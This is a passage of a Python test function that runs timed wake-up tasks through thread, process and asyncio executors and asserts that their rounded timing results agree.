    cstart = round(time.time() + _start_warm_up)
    input1 = [cstart + i for i in pre_input1]
    input2 = [cstart + i for i in pre_input2]
    input3 = [cstart + i for i in pre_input3]

    async def async_main():
        for x in input1:
            future = cexec.submit(async_wake_at, x)
            future.add_done_callback(
                functools.partial(result_checker, cresult, lock))
        result_iter = cexec.map(async_wake_at, input2)
        for x in input3:
            future = cexec.submit(async_wake_at, x)
            future.add_done_callback(
                functools.partial(result_checker, cresult, lock))
        async for x in result_iter:
            with lock:
                cresult.append(x)
        await cexec.shutdown(False)

    loop.run_until_complete(async_main())

    try:
        loop.run_until_complete(cexec.shutdown(True))
        texec.shutdown(True)
        pexec.shutdown(True)
    finally:
        loop.close()

    tresult = [round((x - tstart) / _precision) for x in tresult]
    presult = [round((x - pstart) / _precision) for x in presult]
    cresult = [round((x - cstart) / _precision) for x in cresult]

    result = True
    for (t, p, c) in zip(tresult, presult, cresult):
        result = result and (t == p)
        if not result:
            print(tresult)
            print(presult)
            print(cresult)
            print(t,p,c)
            assert False
        result = result and (p == c)
        if not result:
            print(tresult)
            print(presult)
            print(cresult)
            print(t, p, c)
            assert False
        result = result and (c == t)
        if not result:
            print(tresult)
            print(presult)
            print(cresult)
            print(t, p, c)
            assert False
    return result